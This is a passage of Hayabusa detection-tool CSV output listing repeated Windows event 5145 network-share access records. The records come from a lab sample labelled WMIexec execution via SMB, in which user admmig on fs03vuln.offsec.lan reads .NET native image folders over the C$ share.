Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.251 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Temp | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.266 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsForm0b574481#\f002202a6660cc8ce07f8ae19d6fac84 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WsatConfig\30fd20e8b16392d487e0f52dfd8a5900 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XamlBuildTask\72aa615c9ea48820d317a6bed7b07213 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\XsdBuildTask\b1861416b236727b9d51d4568d9f6841 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.360 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Accessibility\fabe62e146147faa9fc09e8b9a63d5cc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.409 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\AuditPolicy42d3d2cc#\9fe5c370593d72077c6ebc935bdccaf8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbmmc\5965cfde76afc1f5c5d70d32fe0c7270 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\blbproxy | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.435 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | 